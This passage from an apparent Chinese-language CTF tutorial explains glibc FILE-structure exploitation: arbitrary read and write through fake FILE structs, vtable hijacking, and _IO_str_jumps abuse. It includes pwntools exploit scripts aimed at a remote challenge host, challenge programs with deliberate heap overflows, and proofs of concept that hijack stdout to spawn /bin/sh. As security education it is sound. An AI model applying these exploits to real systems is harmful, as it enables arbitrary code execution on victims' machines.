# Short aliases for the pwntools tube `r` that is created below.
def s(payload): return r.send(payload)
def sl(payload): return r.sendline(payload)
def sla(after, payload): return r.sendlineafter(after, payload)
def sa(after, payload): return r.sendafter(after, payload)
def rc(num): return r.recv(num)
def rcl(): return r.recvline()
def rcls(num): return r.recvlines(num)
def rcu(payload): return r.recvuntil(payload)
def ita(): return r.interactive()
def cl(): return r.close()
def tsl(): return time.sleep(0.2)

context(arch = 'amd64', os = 'linux')

# Choose between the local binary and the remote service.
REMOTE_LOCAL=input("local?(y/n):")
if REMOTE_LOCAL=="y":
    r=process('./aar')
    debug_init()
else:
    REMOTE_INFO=split_nc("nc naup.com 2000")
    REMOTE_IP=REMOTE_INFO[0]
    REMOTE_PORT=int(REMOTE_INFO[1])
    r=remote(REMOTE_IP,REMOTE_PORT)

### exploit
flag_addr = 0x404050
# Address stored into the fake FILE's _lock field.
lock_addr = 0x404a00
# 0x10 bytes filling buf, then the next chunk's prev_size (0) and size (0x1e1).
padding = flat(0x0,0x0,0x0,0x1e1)
FS = FILESTRUCTURE()
# flags 0x800 = _IO_CURRENTLY_PUTTING; leak 0x10 bytes starting at flag_addr.
payload = FS.aar(padding, 0x00000800, flag_addr, 0x10, lock_addr)
s(payload)
###
ita()
```
NAUP_filestructure_lib.py
```python=
from pwn import *
class FILESTRUCTURE:
    """Helper that builds fake FILE payloads on top of pwntools' FileStructure."""

    def __init__(self):
        # One FileStructure is kept per instance; fields set by a call
        # stay set on self.FS for later calls.
        self.FS = FileStructure(0)

    def aar(self, padding: bytes, flags: int, target_addr: int, size: int, lock_addr: int):
        """Build an arbitrary-read payload.

        padding     -- bytes placed in front of the fake FILE structure
        flags       -- value stored in the FILE's flags field
        target_addr -- start address of the memory to leak
        size        -- number of bytes to leak
        lock_addr   -- address stored in the _lock field

        Returns padding followed by the serialized structure with its last
        8 bytes dropped.
        """
        self.FS.flags = flags
        # _IO_read_end and _IO_write_base are set to the same address.
        self.FS._IO_read_end = target_addr
        self.FS._IO_write_base = target_addr
        # _IO_buf_end and _IO_write_ptr both mark the end of the leaked range.
        self.FS._IO_buf_end = target_addr + size
        self.FS._IO_write_ptr = target_addr + size
        self.FS._lock = lock_addr
        self.FS.fileno = 1
        return padding + bytes(self.FS)[:-8]
```
這樣就成功任意讀了
![image](https://hackmd.io/_uploads/B1n6efjhA.png)
## Arbitrary write
```c
#include <stdio.h>
#include <string.h>

// gcc arbitrary_write_fread.c -o arbitrary_write_fread

/*
 * Hand-written mirror of the leading fields of glibc's FILE object (up to
 * _fileno), used to redirect the stream's buffer pointers.
 */
typedef struct {
    int _flags;
    char *_IO_read_ptr;
    char *_IO_read_end;
    char *_IO_read_base;
    char *_IO_write_base;
    char *_IO_write_ptr;
    char *_IO_write_end;
    char *_IO_buf_base;
    char *_IO_buf_end;
    char *_IO_save_base;
    char *_IO_backup_base;
    char *_IO_save_end;
    void *_markers;
    void *_chain;
    int _fileno;
} IO_FILE;

/*
 * Demo: make fread() write attacker input into `target` by pointing the
 * stream's buffer at it and switching the descriptor to stdin.
 */
int main(void)
{
    char target[] = "Programmer: You can't change me\n";
    char buf[0x20] = { 0 };
    FILE *fp;
    IO_FILE *p;

    printf("Let's Demo a arbitrary write\n");

    fp = fopen("fread.txt", "r+");
    if (fp == NULL) {
        /* "r+" needs an existing file; fail cleanly instead of crashing. */
        perror("fopen");
        return 1;
    }
    /* Explicit cast: FILE and IO_FILE are unrelated types to the compiler. */
    p = (IO_FILE *)fp;

    /* A non-NULL buffer base means no new buffer gets allocated. */
    p->_IO_buf_base = target;
    /* Buffer size must exceed the requested byte count to reach underflow. */
    p->_IO_buf_end = target + sizeof(buf) + 1;
    /* read_ptr == read_end: nothing buffered, so the stream must refill. */
    p->_IO_read_ptr = target;
    p->_IO_read_end = target;
    /* Refill from stdin instead of the opened file. */
    p->_fileno = 0;

    fread(buf, 1, sizeof(buf), fp);
    /* NOTE: the refill may overwrite target's terminating NUL. */
    puts(target);
    return 0;
}
```
我們輸入的東西被確實的寫到了target
```c
ctf@dab0beb7c7ce:~/pwn/FS$ ./demo
Let's Demo a arbitrary write
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaatk��
```
一樣來看為甚麼這樣設定
### fread IO source code
目標是要進到underflow中call read syscall
需要bypass一些東西
首先我們不希望他malloc一塊,所以我們要把 fp->_IO_buf_base 賦值
把他設為要寫的地方
```c
size_t
_IO_file_xsgetn (FILE *fp, void *data, size_t n)
{
size_t want, have;
ssize_t count;
char *s = data;
want = n;
if (fp->_IO_buf_base == NULL)
{
/* Maybe we already have a push back pointer. */
if (fp->_IO_save_base != NULL)
{
free (fp->_IO_save_base);
fp->_flags &= ~_IO_IN_BACKUP;
}
_IO_doallocbuf (fp);
}
```
want是要讀取的數量,正常都會>0
have 是 fp->_IO_read_end - fp->_IO_read_ptr ,是剩餘buffer的數量
我們要進到underflow,所以把fp->_IO_read_end 和 fp->_IO_read_ptr 設為相等,讓have是0會方便很多
這樣不會進
if (want <= have)
if (have > 0)
兩條
backup基本上也都不會進
```c
while (want > 0)
{
have = fp->_IO_read_end - fp->_IO_read_ptr;
if (want <= have)
{
memcpy (s, fp->_IO_read_ptr, want);
fp->_IO_read_ptr += want;
want = 0;
}
else
{
if (have > 0)
{
s = __mempcpy (s, fp->_IO_read_ptr, have);
want -= have;
fp->_IO_read_ptr += have;
}
/* Check for backup and repeat */
if (_IO_in_backup (fp))
{
_IO_switch_to_main_get_area (fp);
continue;
}
```
這邊的話之前已經設定過了fp->_IO_buf_base,所以會過
want < (size_t) (fp->_IO_buf_end - fp->_IO_buf_base)
這邊只要讓 _IO_buf_end - _IO_buf_base 比 want(要讀取的長度)大就可以了
所以設成了
sizeof(buf) + 1
```c
/* If we now want less than a buffer, underflow and repeat
the copy. Otherwise, _IO_SYSREAD directly to
the user buffer. */
if (fp->_IO_buf_base
&& want < (size_t) (fp->_IO_buf_end - fp->_IO_buf_base))
{
if (__underflow (fp) == EOF)
break;
continue;
}
```
__underflow 內的東西都不用繞,出問題了再來檢查就好
```c
int
__underflow (FILE *fp)
{
if (_IO_vtable_offset (fp) == 0 && _IO_fwide (fp, -1) != -1)
return EOF;
if (fp->_mode == 0)
_IO_fwide (fp, -1);
if (_IO_in_put_mode (fp))
if (_IO_switch_to_get_mode (fp) == EOF)
return EOF;
if (fp->_IO_read_ptr < fp->_IO_read_end)
return *(unsigned char *) fp->_IO_read_ptr;
if (_IO_in_backup (fp))
{
_IO_switch_to_main_get_area (fp);
if (fp->_IO_read_ptr < fp->_IO_read_end)
return *(unsigned char *) fp->_IO_read_ptr;
}
if (_IO_have_markers (fp))
{
if (save_for_backup (fp, fp->_IO_read_end))
return EOF;
}
else if (_IO_have_backup (fp))
_IO_free_backup_area (fp);
return _IO_UNDERFLOW (fp);
}
libc_hidden_def (__underflow)
```
進 _IO_UNDERFLOW -> _IO_file_underflow -> _IO_new_file_underflow
這部分也是有問題再繞,基本上都不會進
最後會call IO syscall read
```c
int
_IO_new_file_underflow (FILE *fp)
{
ssize_t count;
/* C99 requires EOF to be "sticky". */
if (fp->_flags & _IO_EOF_SEEN)
return EOF;
if (fp->_flags & _IO_NO_READS)
{
fp->_flags |= _IO_ERR_SEEN;
__set_errno (EBADF);
return EOF;
}
if (fp->_IO_read_ptr < fp->_IO_read_end)
return *(unsigned char *) fp->_IO_read_ptr;
if (fp->_IO_buf_base == NULL)
{
/* Maybe we already have a push back pointer. */
if (fp->_IO_save_base != NULL)
{
free (fp->_IO_save_base);
fp->_flags &= ~_IO_IN_BACKUP;
}
_IO_doallocbuf (fp);
}
/* FIXME This can/should be moved to genops ?? */
if (fp->_flags & (_IO_LINE_BUF|_IO_UNBUFFERED))
{
/* We used to flush all line-buffered stream. This really isn't
required by any standard. My recollection is that
traditional Unix systems did this for stdout. stderr better
not be line buffered. So we do just that here
explicitly. --drepper */
_IO_acquire_lock (stdout);
if ((stdout->_flags & (_IO_LINKED | _IO_NO_WRITES | _IO_LINE_BUF))
== (_IO_LINKED | _IO_LINE_BUF))
_IO_OVERFLOW (stdout, EOF);
_IO_release_lock (stdout);
}
_IO_switch_to_get_mode (fp);
/* This is very tricky. We have to adjust those
pointers before we call _IO_SYSREAD () since
we may longjump () out while waiting for
input. Those pointers may be screwed up. H.J. */
fp->_IO_read_base = fp->_IO_read_ptr = fp->_IO_buf_base;
fp->_IO_read_end = fp->_IO_buf_base;
fp->_IO_write_base = fp->_IO_write_ptr = fp->_IO_write_end
= fp->_IO_buf_base;
count = _IO_SYSREAD (fp, fp->_IO_buf_base,
fp->_IO_buf_end - fp->_IO_buf_base);
```
另外我們把fileno設為了stdin,他會從你的stdin開始讀
這樣他就將我們的stdin讀到target了
### 題目
```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <fcntl.h>
// Practice target for the arbitrary-write technique.
// The oversized read() below is the bug the exploit relies on; it is kept
// on purpose.
char flag[0x10] = "FLAG{TEST}\n";
// Global the exploit has to modify so the check in main() prints the flag.
char owo[] = "OWO!";
int main()
{
FILE *fp;
char *buf;
// 0x10-byte heap buffer, allocated before the stream is opened.
buf = malloc(0x10);
fp = fopen("/tmp/meow", "r");
// Reads up to 0x1000 bytes into the 0x10-byte buffer (heap overflow).
read(0, buf, 0x1000);
// Reads one 0x10-byte item through fp into buf.
fread(buf, 0x10, 1, fp);
// The flag is printed only if owo no longer equals "OWO!".
if (strcmp(owo, "OWO!") != 0)
write(1, flag, sizeof(flag));
return 0;
}
```
一樣有heap overflow的問題,padding 一樣
設定該設定的
p->_IO_buf_base = target;
p->_IO_buf_end = target + sizeof(buf) + 1;
p->_fileno = 0;
並且一樣要設定_lock成合法的位置
一樣不要蓋到vtable
```python=
from pwn import *
from NAUP_pwn_lib import *
import time
from NAUP_filestructure_lib import *

# Short aliases for the pwntools tube `r` that is created below.
def s(payload): return r.send(payload)
def sl(payload): return r.sendline(payload)
def sla(after, payload): return r.sendlineafter(after, payload)
def sa(after, payload): return r.sendafter(after, payload)
def rc(num): return r.recv(num)
def rcl(): return r.recvline()
def rcls(num): return r.recvlines(num)
def rcu(payload): return r.recvuntil(payload)
def ita(): return r.interactive()
def cl(): return r.close()
def tsl(): return time.sleep(0.2)

context(arch = 'amd64', os = 'linux')

# Choose between the local binary and the remote service.
REMOTE_LOCAL=input("local?(y/n):")
if REMOTE_LOCAL=="y":
    r=process('./aaw')
    debug_init()
else:
    REMOTE_INFO=split_nc("nc naup.com 2000")
    REMOTE_IP=REMOTE_INFO[0]
    REMOTE_PORT=int(REMOTE_INFO[1])
    r=remote(REMOTE_IP,REMOTE_PORT)

### exploit
target_addr = 0x404070
# Address stored into the fake FILE's _lock field.
lock_addr = 0x4040a0
# 0x10 bytes filling buf, then the next chunk's prev_size (0) and size (0x1e1).
padding = flat(0x0,0x0,0x0,0x1e1)
FS = FILESTRUCTURE()
# NOTE(review): size 0x5 is smaller than the 0x10 bytes fread requests, so the
# stream presumably only refills into target_addr once fewer than 5 bytes
# remain to be read -- which would explain why extra input is needed after
# this script runs. Confirm in gdb.
payload = FS.aaw(padding,0x0,target_addr,0x5,lock_addr)
s(payload)
###
ita()
```
NAUP_filestructure_lib.py
```python=
from pwn import *
class FILESTRUCTURE:
    """Helper that builds fake FILE payloads on top of pwntools' FileStructure."""

    def __init__(self):
        # One FileStructure is kept per instance; fields set by a call
        # stay set on self.FS for later calls.
        self.FS = FileStructure(0)

    def aar(self, padding: bytes, flags: int, target_addr: int, size: int, lock_addr: int):
        """Build an arbitrary-read payload.

        padding     -- bytes placed in front of the fake FILE structure
        flags       -- value stored in the FILE's flags field
        target_addr -- start address of the memory to leak
        size        -- number of bytes to leak
        lock_addr   -- address stored in the _lock field

        Returns padding followed by the serialized structure with its last
        8 bytes dropped.
        """
        self.FS.flags = flags
        # _IO_read_end and _IO_write_base are set to the same address.
        self.FS._IO_read_end = target_addr
        self.FS._IO_write_base = target_addr
        # _IO_buf_end and _IO_write_ptr both mark the end of the leaked range.
        self.FS._IO_buf_end = target_addr + size
        self.FS._IO_write_ptr = target_addr + size
        self.FS._lock = lock_addr
        self.FS.fileno = 1
        return padding + bytes(self.FS)[:-8]

    def aaw(self, padding: bytes, flags: int, target_addr: int, size: int, lock_addr: int):
        """Build an arbitrary-write payload.

        padding     -- bytes placed in front of the fake FILE structure
        flags       -- value stored in the FILE's flags field
        target_addr -- address the stream buffer is pointed at
        size        -- length of the fake stream buffer
        lock_addr   -- address stored in the _lock field

        Returns padding followed by the serialized structure with its last
        8 bytes dropped.
        """
        # The flags argument used to be accepted but never applied.
        self.FS.flags = flags
        self.FS._lock = lock_addr
        # The stream buffer covers [target_addr, target_addr + size).
        self.FS._IO_buf_base = target_addr
        self.FS._IO_buf_end = target_addr + size
        # read_ptr == read_end: nothing is buffered yet.
        self.FS._IO_read_ptr = target_addr
        self.FS._IO_read_end = target_addr
        self.FS.fileno = 0
        return padding + bytes(self.FS)[:-8]
```
腳本跑完後,多輸入幾個觸發EOF
就可以任意寫了
![image](https://hackmd.io/_uploads/HJGijni2A.png)
## IO_FILE_PLUS exploitation
### glibc < 2.24
在glibc 2.24前,如果我去修改 _IO_FILE_plus 中指向vtable的pointer,不會做檢查
所以我可以嘗試偽造一個vtable在stack上或其他地方,然後指過去,vtable中可以將某些變數改為自己想要跳轉的地方
```
IO_FILE_plus fake vtable
-------------- --> --------------
| | | | |
| | | | |
| | | | |
| | | | |
| | | | |
| vtable | ----- | |
-------------- --------------
```
像是這樣
```c
#include <stdio.h>
#include <stdlib.h>

// Testing with libc-2.23
// gcc fake_vtable.c -o fake_vtable

/* Target of the hijacked vtable slot: spawns a shell. */
void backdoor(void)
{
    system("/bin/sh");
}

/*
 * Demo: replace stdout's vtable pointer with a table on the stack whose
 * slot 7 points at backdoor(), then call puts() to trigger it.
 */
int main(void)
{
    char *p;
    void **vtable;
    void *fake_vtable[20] = { 0 };

    /* Treat stdout as raw bytes so the pointer can be found by offset. */
    p = (char *)stdout;
    /* 0xd8: offset this PoC uses for the vtable pointer -- assumes the
       x86-64 glibc layout; confirm on the target libc. */
    vtable = (void **)&p[0xd8];
    *vtable = fake_vtable;
    /* Slot 7 is the one puts() ends up calling in this demo. */
    fake_vtable[7] = (void *)backdoor;
    puts("Demo");
    return 0;
}
```
先做一個假的vtable,fake_vtable[7]是__xsputn,我把它改成backdoor,這樣當我們call puts就會跳到backdoor
```c
struct _IO_jump_t
{
JUMP_FIELD(size_t, __dummy);
JUMP_FIELD(size_t, __dummy2);
JUMP_FIELD(_IO_finish_t, __finish);
JUMP_FIELD(_IO_overflow_t, __overflow);
JUMP_FIELD(_IO_underflow_t, __underflow);
JUMP_FIELD(_IO_underflow_t, __uflow);
JUMP_FIELD(_IO_pbackfail_t, __pbackfail);
/* showmany */
JUMP_FIELD(_IO_xsputn_t, __xsputn);
```
```
ctf@dab0beb7c7ce:~/pwn/FS$ ./demoplus
$ ls
demo demo.c demoplus demoplus.c fread.txt
```
開成功
### glibc >= 2.24
按照剛剛打法直接噴了error
```
naup@naup-virtual-machine:~/Desktop/cwctCTF$ ./demo
Fatal error: glibc detected an invalid stdio handle
```
那是因為他檢查了vtable所在的位置
直接舉個例子當我們call _IO_sputn,他是一個macro,展開來後
```c
#define _IO_sputn(__fp, __s, __n) _IO_XSPUTN (__fp, __s, __n)
```
```c
#define _IO_XSPUTN(FP, DATA, N) JUMP2 (__xsputn, FP, DATA, N)
```
```c
#define JUMP2(FUNC, THIS, X1, X2) (_IO_JUMPS_FUNC(THIS)->FUNC) (THIS, X1, X2)
```
```c
# define _IO_JUMPS_FUNC(THIS) \
(IO_validate_vtable \
(*(struct _IO_jump_t **) ((void *) &_IO_JUMPS_FILE_plus (THIS) \
+ (THIS)->_vtable_offset)))
```
macro展開後會call IO_validate_vtable,檢查vtable位在哪個區段
只要落在 __start___libc_IO_vtables ~ __stop___libc_IO_vtables
之間就可以過
```c
IO_validate_vtable (const struct _IO_jump_t *vtable)
{
/* Fast path: The vtable pointer is within the __libc_IO_vtables
section. */
uintptr_t section_length = __stop___libc_IO_vtables - __start___libc_IO_vtables;
uintptr_t ptr = (uintptr_t) vtable;
uintptr_t offset = ptr - (uintptr_t) __start___libc_IO_vtables;
if (__glibc_unlikely (offset >= section_length))
/* The vtable pointer is not in the expected section. Use the
slow path, which will terminate the process if necessary. */
_IO_vtable_check ();
return vtable;
}
```
繞過不實際
```c
void attribute_hidden
_IO_vtable_check (void)
{
#ifdef SHARED
/* Honor the compatibility flag. */
void (*flag) (void) = atomic_load_relaxed (&IO_accept_foreign_vtables);
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (flag);
#endif
if (flag == &_IO_vtable_check)
return;
/* In case this libc copy is in a non-default namespace, we always
need to accept foreign vtables because there is always a
possibility that FILE * objects are passed across the linking
boundary. */
{
Dl_info di;
struct link_map *l;
if (!rtld_active ()
|| (_dl_addr (_IO_vtable_check, &di, &l, NULL) != 0
&& l->l_ns != LM_ID_BASE))
return;
}
#else /* !SHARED */
/* We cannot perform vtable validation in the static dlopen case
because FILE * handles might be passed back and forth across the
boundary. Therefore, we disable checking in this case. */
if (__dlopen != NULL)
return;
#endif
__libc_fatal ("Fatal error: glibc detected an invalid stdio handle\n");
}
```
可以直接改vtable上的pointer成如Onegadget等位置,然而需要Glibc 2.29後,因為2.29前放在不可寫段
### IO_str_jumps (glibc 2.27)
在Glibc < 2.29時候
還有其他地方的vtable可以利用
這裡有 IO_str_jumps可以嘗試做利用
```c
const struct _IO_jump_t _IO_str_jumps libio_vtable =
{
JUMP_INIT_DUMMY,
JUMP_INIT(finish, _IO_str_finish),
JUMP_INIT(overflow, _IO_str_overflow),
JUMP_INIT(underflow, _IO_str_underflow),
JUMP_INIT(uflow, _IO_default_uflow),
JUMP_INIT(pbackfail, _IO_str_pbackfail),
JUMP_INIT(xsputn, _IO_default_xsputn),
JUMP_INIT(xsgetn, _IO_default_xsgetn),
JUMP_INIT(seekoff, _IO_str_seekoff),
JUMP_INIT(seekpos, _IO_default_seekpos),
JUMP_INIT(setbuf, _IO_default_setbuf),
JUMP_INIT(sync, _IO_default_sync),
JUMP_INIT(doallocate, _IO_default_doallocate),
JUMP_INIT(read, _IO_default_read),
JUMP_INIT(write, _IO_default_write),
JUMP_INIT(seek, _IO_default_seek),
JUMP_INIT(close, _IO_default_close),
JUMP_INIT(stat, _IO_default_stat),
JUMP_INIT(showmanyc, _IO_default_showmanyc),
JUMP_INIT(imbue, _IO_default_imbue)
};
```
他是 IO_strfile 用的
如果我將stdout的vtable pointer指向 _IO_str_jumps 往前偏移幾格的位置,讓vtable\[7\](也就是第八個,原本xsputn的位置)剛好對到 _IO_str_overflow,這樣puts就會call到 _IO_str_overflow(原本是xsputn)
因為這個位址仍然落在放vtable的section中,所以能通過 IO_validate_vtable 的檢查
```
IO_FILE_plus fake vtable (IO_str_jumps)
-------------- --> ----------------------
| | | | |
| | | | |
| | | | |
| | | | |
| | | | DUMMY1 |
| vtable | ----- | DUMMY2 |
-------------- | _IO_str_finish |
| _IO_str_overflow |
| |
----------------------
```
接下來我們依據glibc 2.27去追 _IO_str_overflow source code
https://elixir.bootlin.com/glibc/glibc-2.27/source/libio/strops.c#L80
```c
#define _IO_blen(fp) ((fp)->_IO_buf_end - (fp)->_IO_buf_base)
int
_IO_str_overflow (_IO_FILE *fp, int c)
{
int flush_only = c == EOF;
_IO_size_t pos;
if (fp->_flags & _IO_NO_WRITES)
return flush_only ? 0 : EOF;
if ((fp->_flags & _IO_TIED_PUT_GET) && !(fp->_flags & _IO_CURRENTLY_PUTTING))
{
fp->_flags |= _IO_CURRENTLY_PUTTING;
fp->_IO_write_ptr = fp->_IO_read_ptr;
fp->_IO_read_ptr = fp->_IO_read_end;
}
pos = fp->_IO_write_ptr - fp->_IO_write_base;
if (pos >= (_IO_size_t) (_IO_blen (fp) + flush_only))
{
if (fp->_flags & _IO_USER_BUF) /* not allowed to enlarge */
return EOF;
else
{
char *new_buf;
char *old_buf = fp->_IO_buf_base;
size_t old_blen = _IO_blen (fp);
_IO_size_t new_size = 2 * old_blen + 100;
if (new_size < old_blen)
return EOF;
new_buf
= (char *) (*((_IO_strfile *) fp)->_s._allocate_buffer) (new_size);
if (new_buf == NULL)
{
/* __ferror(fp) = 1; */
return EOF;
}
if (old_buf)
{
memcpy (new_buf, old_buf, old_blen);
(*((_IO_strfile *) fp)->_s._free_buffer) (old_buf);
/* Make sure _IO_setb won't try to delete _IO_buf_base. */
fp->_IO_buf_base = NULL;
}
memset (new_buf + old_blen, '\0', new_size - old_blen);
_IO_setb (fp, new_buf, new_buf + new_size, 1);
fp->_IO_read_base = new_buf + (fp->_IO_read_base - old_buf);
fp->_IO_read_ptr = new_buf + (fp->_IO_read_ptr - old_buf);
fp->_IO_read_end = new_buf + (fp->_IO_read_end - old_buf);
fp->_IO_write_ptr = new_buf + (fp->_IO_write_ptr - old_buf);
fp->_IO_write_base = new_buf;
fp->_IO_write_end = fp->_IO_buf_end;
}
}
if (!flush_only)
*fp->_IO_write_ptr++ = (unsigned char) c;
if (fp->_IO_write_ptr > fp->_IO_read_end)
fp->_IO_read_end = fp->_IO_write_ptr;
return c;
}
libc_hidden_def (_IO_str_overflow)
```
我們目標是`(char *) (*((_IO_strfile *) fp)->_s._allocate_buffer) (new_size)`
如果我們把 _s._allocate_buffer 寫成 system
再把 new_size 控制成 /bin/sh 字串的位址(new_size = 2 * old_blen + 100,所以要反推 _IO_buf_end - _IO_buf_base)
就等於呼叫 system("/bin/sh"),可以成功
以下是 PoC
```c
#include <stdio.h>
#include <stdlib.h>
// Testing with libc-2.27
// gcc iostroverflow.c -o iostroverflow
// Field layout this PoC relies on, kept for reference only.
// NOTE(review): the casts to _IO_FILE below presumably use the type that the
// libc-2.27 headers already declare -- confirm.
// typedef struct {
// int _flags;
// char *_IO_read_ptr;
// char *_IO_read_end;
// char *_IO_read_base;
// char *_IO_write_base;
// char *_IO_write_ptr;
// char *_IO_write_end;
// char *_IO_buf_base;
// char *_IO_buf_end;
// char *_IO_save_base;
// char *_IO_backup_base;
// char *_IO_save_end;
// void *_markers;
// void *_chain;
// int _fileno;
// } _IO_FILE;
// Demo: point stdout's vtable into _IO_str_jumps so that puts() reaches
// _IO_str_overflow, whose allocator call is redirected to system().
int main(void)
{
char *p;
void **vtable;
void *libc;
void **_IO_str_jumps;
void **_s;
char sh[] = "/bin/sh";
// Hard-coded offsets: libc is derived from printf's address and
// _IO_str_jumps from libc. Presumably specific to the author's
// libc-2.27 build -- recompute for any other libc.
libc = (char *)printf - 0x64f00;
_IO_str_jumps = (char *)libc + 0x3e8360;
p = stdout;
// 0xd8 / 0xe0: byte offsets from stdout used for the vtable pointer and
// for the slot treated as _s._allocate_buffer.
vtable = (void *)&p[0xd8];
_s = (void *)&p[0xe0];
// Set vtable[7] = _IO_str_overflow
// (shift the table base so index 7 lands on _IO_str_jumps[3])
*vtable = _IO_str_jumps + 3 - 7;
// Set fp->_s._allocate_buffer
*_s = system;
// Set new_size
// With _IO_buf_base = 0, old_blen equals _IO_buf_end, and
// new_size = 2 * old_blen + 100, so this aims new_size at sh's address.
// NOTE(review): the integer division drops one if (sh - 100) is odd.
((_IO_FILE *)p)->_IO_buf_base = 0;
((_IO_FILE *)p)->_IO_buf_end = (unsigned long long)(sh - 100) / 2;
// Set pos >= _IO_blen(fp) + flush_only
((_IO_FILE *)p)->_IO_write_base = 0;
((_IO_FILE *)p)->_IO_write_ptr = ((_IO_FILE *)p)->_IO_buf_end + 1;
// Call _IO_str_overflow
puts("Demo");
}
```
### IO_str_jumps (glibc 2.29)
那就會想說,為什麼不直接把 vtable 裡面的 function pointer 改成 one gadget 就好?
因為 vtable 所在的 section 是 ro 段(蠻合理的,畢竟 vtable 只是用來查 function 位置,不需要 w 權限),所以平常沒辦法直接改寫;不過在 glibc 2.29 這個 section 變成不是 ro(可寫),所以利用起來很簡單
```c
#include <stdio.h>
#include <stdlib.h>
// Testing with libc-2.29
// gcc overwrite_iovtables.c -o overwrite_iovtables
// typedef struct {
// int _flags;
// char *_IO_read_ptr;
// char *_IO_read_end;
// char *_IO_read_base;
// char *_IO_write_base;
// char *_IO_write_ptr;
// char *_IO_write_end;
// char *_IO_buf_base;
// char *_IO_buf_end;
// char *_IO_save_base;
// char *_IO_backup_base;
// char *_IO_save_end;
// void *_markers;
// void *_chain;
// int _fileno;
// } _IO_FILE;
// Hijack target for the vtable-overwrite demo: runs /bin/sh through system().
// Takes no arguments and returns nothing; the status returned by system()
// is ignored.
void backdoor(void)
{
    const char *cmd = "/bin/sh";

    system(cmd);
}
// PoC entry point: overwrites an entry of the _IO_str_jumps table itself with
// the address of backdoor(), then shifts stdout's vtable pointer so the final
// puts() call dispatches through that overwritten entry.
// This relies on the table being writable and on hard-coded libc offsets
// (the header comment above says libc-2.29).
int main(void)
{
// Raw byte view of the stdout FILE object, used to reach fields by offset.
char *p;
// Address of the slot that holds stdout's vtable pointer.
void **vtable;
// Computed libc base address.
void *libc;
// Address of the _IO_str_jumps table inside libc.
void **_IO_str_jumps;
// Unused in this PoC.
void **_s;
// Presumably 0x62830 is printf's offset inside the target libc, so the
// subtraction yields the libc base -- confirm against the actual build.
libc = (char *)printf - 0x62830;
// Presumably 0x1e6620 is the offset of _IO_str_jumps in that same libc -- confirm.
_IO_str_jumps = (char *)libc + 0x1e6620;
p = stdout;
// Byte offset 0xd8: presumably the vtable pointer that follows the FILE
// struct inside _IO_FILE_plus on x86-64 -- confirm for the target ABI.
vtable = (void *)&p[0xd8];
// Set vtable[7] = _IO_str_jumps.overflow.
// _IO_str_jumps is a void **, so "+ 3 - 7" moves back four pointer-sized
// slots: slot 7 of the shifted table is slot 3 of the real _IO_str_jumps.
*vtable = _IO_str_jumps + 3 - 7;
// Overwrite _IO_str_jumps.overflow to backdoor
_IO_str_jumps[3] = backdoor;
// Call vtable[7] --> call backdoor
puts("Demo");
}
```
(這邊我看得一臉懵,不知道為什麼 glibc 2.29 要把這個 section 改成可寫,不過後來的版本又改回 ro 了)
## FSOP(glibc < 2.24)
也可以透過 hijack `_IO_list_all` 來偽造一整條 `_chain`
`_IO_flush_all_lockp` 會沿著 `_IO_list_all` 這條 chain,把所有 file structure 上的東西 flush 出去(所以會 call `_IO_OVERFLOW`)
main return、libc 偵測到記憶體錯誤而 abort、call exit 時,都會 call 到 `_IO_flush_all_lockp`
## ref
https://tttang.com/archive/1345/
https://blog.csdn.net/qq_41202237/article/details/113845320
https://blog.wingszeng.top/pwn-glibc-file-struct-and-related-functions/
https://blog.csdn.net/m0_70811813/article/details/127218742?ops_request_misc=%257B%2522request%255Fid%2522%253A%252207DB9A83-4C5B-4673-AB65-C877A51684E7%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=07DB9A83-4C5B-4673-AB65-C877A51684E7&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2
https://a1ex.online/2020/10/01/glibc-IO%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90/
https://www.youtube.com/watch?v=_TYWsA8gEW0
https://github.com/u1f383/Software-Security-2021-2022/tree/master/2022/week3
https://www.mrskye.cn/archives/221/